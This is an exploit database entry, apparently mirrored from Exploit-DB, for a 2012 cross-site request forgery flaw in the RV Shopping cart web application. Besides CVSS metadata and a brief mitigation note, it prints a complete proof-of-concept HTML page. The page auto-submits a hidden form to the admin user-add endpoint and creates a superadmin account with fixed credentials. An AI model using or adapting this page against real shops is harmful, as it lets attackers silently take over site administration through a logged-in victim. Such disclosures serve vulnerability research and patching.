RV Shopping cart CSRF Vulnerability

vendor:

RV Shopping cart

by:

DaOne

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: RV Shopping cart

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

RV Shopping cart CSRF Vulnerability

This exploit allows an attacker to add an admin user to the RV Shopping cart application. The attacker can craft a malicious HTML page with a form that contains the necessary parameters to add an admin user. When the victim visits the malicious page, the form is automatically submitted and the admin user is added to the application.

Mitigation:

Implementing CSRF protection tokens, validating the HTTP Referer header, and using CAPTCHA can help mitigate CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: RV Shopping cart CSRF Vulnerability
# Date: 26/08/2012
# Author: DaOne (@LibyanCA)
# Vendor: http://www.scripts4webmasters.com
# Greetings to LCA


# CSRF Add Admin

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/rvp-admin/user-add.php">
<input type="hidden" name="user_id" value=""/>
<input type="hidden" name="username" value="webadmin">
<input type="hidden" name="email" value="admin@email.com">
<input type="hidden" name="password" value="pass123">
<input type="hidden" name="group[]" value="1"/>
<input type="hidden" name="active" value="1"/>
<input type="hidden" name="superadmin" value="1"/>
<input type="hidden" name="postnote" value=""/>
<input type="hidden" name="save_user" value="Save"/>
</form>
</body>
</html>